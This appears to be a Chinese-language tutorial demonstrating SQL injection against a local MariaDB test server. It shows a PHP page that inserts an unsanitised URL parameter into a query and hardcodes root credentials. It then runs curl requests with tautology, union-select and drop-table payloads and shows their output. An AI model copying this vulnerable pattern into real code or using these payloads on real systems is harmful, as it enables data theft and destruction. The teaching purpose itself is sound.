$_GET['user']
函式取得在 php 網址後加入的 ?user=...
參數查詢,其中 MYSQL_NUM
指定使用數字索引。
[root@kvm3 ~]# cd /var/www/html/ [root@kvm3 html]# vim injection.php [root@kvm3 html]# cat injection.php <?php $dbhost = 'localhost:3306'; $dbuser = 'root'; $dbpass = '123qwe'; $conn = mysqli_connect($dbhost, $dbuser, $dbpass) or die(mysqli_connect_error().PHP_EOL); mysqli_select_db( $conn, 'mysql' ) or die('Error: '.mysqli_error($conn).PHP_EOL); $sql = "SELECT host,user FROM user WHERE user={$_GET['user']}"; $retval = mysqli_query( $conn,$sql ) or die('Error: '.mysqli_error($conn).PHP_EOL); while($row = mysqli_fetch_array($retval, MYSQLI_NUM)) { echo "HOST: {$row[0]}<br>User: {$row[1]}<br>". "--------------------------------<br>"; } mysqli_free_result($retval); echo "Fetched data successfully\n"; mysqli_close($conn); ?>
?user='root'
,查詢結果列出 host 及 user。
[root@kvm3 html]# curl -s http://kvm3/injection.php?"user='root'" | sed 's/<br> */\n/g' HOST: localhost User: root -------------------------------- Fetched data successfully
?user='a' or 1
,查詢結果回應所有的帳號,範例中 %20
是空白,不能直接打空白,否則 $_GET
會報錯。
[root@kvm3 html]# curl -s http://kvm3/injection.php?"user=\ 'a'%20or%201" | sed 's/<br> */\n/g' HOST: 192.168.122.1 User: hosttest -------------------------------- HOST: localhost User: dywang -------------------------------- HOST: localhost User: mariadb.sys -------------------------------- HOST: localhost User: mysql -------------------------------- HOST: localhost User: root -------------------------------- Fetched data successfully
?user='a' union all select host,user from user
,查詢結果列出所有 host 及 user,因為可以注入 union all ....
的條件。
[root@kvm3 html]# curl -s http://kvm3/injection.php?"user=\ 'a'%20union%20all%20select%20host,user%20from%20user" | sed 's/<br> */\n/g' HOST: 192.168.122.1 User: hosttest -------------------------------- HOST: localhost User: dywang -------------------------------- HOST: localhost User: mariadb.sys -------------------------------- HOST: localhost User: mysql -------------------------------- HOST: localhost User: root -------------------------------- Fetched data successfully
?user='a'; drop table user
,查詢報錯,因為 PHP 的 mysqli_query
函式只接受單一詢問,加入分號來進行第二個詢問不被接受。
[root@kvm3 html]# curl -s http://kvm3/injection.php?"user='a';drop%20table%20user" Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'drop table user' at line 1